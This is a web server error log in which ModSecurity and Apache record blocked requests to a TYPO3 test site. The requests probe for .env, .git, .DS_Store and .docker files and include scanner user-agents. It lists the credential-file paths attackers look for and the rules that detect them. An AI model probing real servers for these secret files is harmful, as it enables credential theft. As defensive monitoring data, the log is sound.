[Mon Jul 07 19:41:46.616558 2025] [:error] [pid 999310] [client 199.193.116.136:16353] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aGwG2h317rZLcfc1S5TakAAAAA4"]
[Mon Jul 07 19:42:00.191392 2025] [:error] [pid 989741] [client 199.193.116.136:25102] [client 199.193.116.136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aGwG6IZW7uBBeGph-gr3EgAAAAU"]
[Mon Jul 07 19:42:00.192413 2025] [:error] [pid 989741] [client 199.193.116.136:25102] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aGwG6IZW7uBBeGph-gr3EgAAAAU"]
[Mon Jul 07 19:42:00.192692 2025] [:error] [pid 989741] [client 199.193.116.136:25102] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aGwG6IZW7uBBeGph-gr3EgAAAAU"]
[Mon Jul 07 19:42:59.831609 2025] [:error] [pid 989737] [client 199.193.116.136:26832] [client 199.193.116.136] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aGwHIxJindOavju_e6FIHwAAAAE"]
[Mon Jul 07 19:42:59.831884 2025] [:error] [pid 989737] [client 199.193.116.136:26832] [client 199.193.116.136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aGwHIxJindOavju_e6FIHwAAAAE"]
[Mon Jul 07 19:42:59.832057 2025] [:error] [pid 989737] [client 199.193.116.136:26832] [client 199.193.116.136] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aGwHIxJindOavju_e6FIHwAAAAE"]
[Thu Jul 10 05:13:40.827801 2025] [:error] [pid 1065741] [client 3.140.182.19:47908] [client 3.140.182.19] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aG8v5KfTzetFftLHN63tfwAAAAQ"]
[Thu Jul 10 05:13:40.830196 2025] [:error] [pid 1065741] [client 3.140.182.19:47908] [client 3.140.182.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aG8v5KfTzetFftLHN63tfwAAAAQ"]
[Thu Jul 10 05:13:40.830450 2025] [:error] [pid 1065741] [client 3.140.182.19:47908] [client 3.140.182.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aG8v5KfTzetFftLHN63tfwAAAAQ"]
[Tue Jul 15 23:53:44.320078 2025] [:error] [pid 1209604] [client 3.22.104.232:45723] [client 3.22.104.232] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aHbN6L4ybIyg_FKEwnVr4AAAAAM"]
[Tue Jul 15 23:53:44.322590 2025] [:error] [pid 1209604] [client 3.22.104.232:45723] [client 3.22.104.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aHbN6L4ybIyg_FKEwnVr4AAAAAM"]
[Tue Jul 15 23:53:44.322786 2025] [:error] [pid 1209604] [client 3.22.104.232:45723] [client 3.22.104.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aHbN6L4ybIyg_FKEwnVr4AAAAAM"]
[Sat Jul 19 03:45:59.745074 2025] [:error] [pid 1291457] [client 3.146.99.138:49222] [client 3.146.99.138] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aHr419epCbFVclWmYEYE-QAAAAU"]
[Sat Jul 19 03:45:59.747128 2025] [:error] [pid 1291457] [client 3.146.99.138:49222] [client 3.146.99.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aHr419epCbFVclWmYEYE-QAAAAU"]
[Sat Jul 19 03:45:59.747331 2025] [:error] [pid 1291457] [client 3.146.99.138:49222] [client 3.146.99.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aHr419epCbFVclWmYEYE-QAAAAU"]
[Mon Jul 21 19:41:14.290822 2025] [authz_core:error] [pid 1359635] [client 68.183.180.73:55006] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Mon Jul 21 19:41:15.789359 2025] [:error] [pid 1359638] [client 68.183.180.73:55042] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aH57u_W-bojLyB3RQ2JCLwAAAAY"]
[Mon Jul 21 19:41:15.789571 2025] [:error] [pid 1359638] [client 68.183.180.73:55042] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aH57u_W-bojLyB3RQ2JCLwAAAAY"]
[Mon Jul 21 19:41:15.789727 2025] [:error] [pid 1359638] [client 68.183.180.73:55042] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aH57u_W-bojLyB3RQ2JCLwAAAAY"]
[Mon Jul 21 19:41:16.270028 2025] [:error] [pid 1359597] [client 68.183.180.73:55044] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH57vLmwlABwH_MGUW3adQAAAAM"]
[Mon Jul 21 19:41:16.270247 2025] [:error] [pid 1359597] [client 68.183.180.73:55044] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH57vLmwlABwH_MGUW3adQAAAAM"]
[Mon Jul 21 19:41:16.270422 2025] [:error] [pid 1359597] [client 68.183.180.73:55044] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH57vLmwlABwH_MGUW3adQAAAAM"]
[Mon Jul 21 19:41:16.772477 2025] [authz_core:error] [pid 1359599] [client 68.183.180.73:55048] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 19:41:33.357075 2025] [authz_core:error] [pid 1359600] [client 93.123.109.64:54936] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 19:43:16.738492 2025] [authz_core:error] [pid 1359628] [client 93.123.109.64:54270] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 19:51:29.918726 2025] [authz_core:error] [pid 1359639] [client 93.123.109.64:57050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 19:52:14.893973 2025] [authz_core:error] [pid 1359599] [client 93.123.109.64:47192] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 19:53:15.864650 2025] [authz_core:error] [pid 1359628] [client 93.123.109.64:58954] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 19:53:21.644151 2025] [authz_core:error] [pid 1359638] [client 93.123.109.64:58960] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 22:33:54.212765 2025] [authz_core:error] [pid 1359598] [client 34.73.71.191:58478] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Jul 21 23:42:01.653217 2025] [authz_core:error] [pid 1359599] [client 185.177.72.16:44616] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 22 02:45:35.070530 2025] [authz_core:error] [pid 1363782] [client 185.177.72.38:43320] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 22 03:51:04.245799 2025] [authz_core:error] [pid 1366310] [client 185.177.72.38:48036] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 22 06:21:13.729016 2025] [authz_core:error] [pid 1366336] [client 13.36.165.173:39746] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 22 08:20:13.465159 2025] [:error] [pid 1366312] [client 155.94.155.152:45298] [client 155.94.155.152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH8tnacikuc3vfjTR1y3DQAAAAM"]
[Tue Jul 22 08:20:13.465385 2025] [:error] [pid 1366312] [client 155.94.155.152:45298] [client 155.94.155.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH8tnacikuc3vfjTR1y3DQAAAAM"]
[Tue Jul 22 08:20:13.465558 2025] [:error] [pid 1366312] [client 155.94.155.152:45298] [client 155.94.155.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH8tnacikuc3vfjTR1y3DQAAAAM"]
[Tue Jul 22 08:59:24.842075 2025] [authz_core:error] [pid 1366309] [client 185.177.72.16:16492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 22 08:59:24.958738 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH82zNMbrvJiBEuR3dHICgAAAAA"]
[Tue Jul 22 08:59:24.959150 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH82zNMbrvJiBEuR3dHICgAAAAA"]
[Tue Jul 22 08:59:24.959430 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aH82zNMbrvJiBEuR3dHICgAAAAA"]
[Tue Jul 22 08:59:25.064219 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tests/test-become/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tests/test-become/.env"] [unique_id "aH82zdMbrvJiBEuR3dHICwAAAAA"]
[Tue Jul 22 08:59:25.064590 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tests/test-become/.env"] [unique_id "aH82zdMbrvJiBEuR3dHICwAAAAA"]
[Tue Jul 22 08:59:25.064874 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tests/test-become/.env"] [unique_id "aH82zdMbrvJiBEuR3dHICwAAAAA"]
[Tue Jul 22 08:59:25.160488 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /_static/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/_static/.env"] [unique_id "aH82zdMbrvJiBEuR3dHIDAAAAAA"]
[Tue Jul 22 08:59:25.160734 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/_static/.env"] [unique_id "aH82zdMbrvJiBEuR3dHIDAAAAAA"]
[Tue Jul 22 08:59:25.160955 2025] [:error] [pid 1366309] [client 185.177.72.16:16492] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/_static/.env"] [unique_id "aH82zdMbrvJiBEuR3dHIDAAAAAA"]
[Tue Jul 22 08:59:43.469922 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aH82341qVEbUREAWsaSSNAAAAAQ"]
[Tue Jul 22 08:59:43.470202 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aH82341qVEbUREAWsaSSNAAAAAQ"]
[Tue Jul 22 08:59:43.470539 2025] [:error] [pid 1366313] [client 185.177.72.16:13400] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/.env"] [unique_id "aH82341qVEbUREAWsaSSNAAAAAQ"]
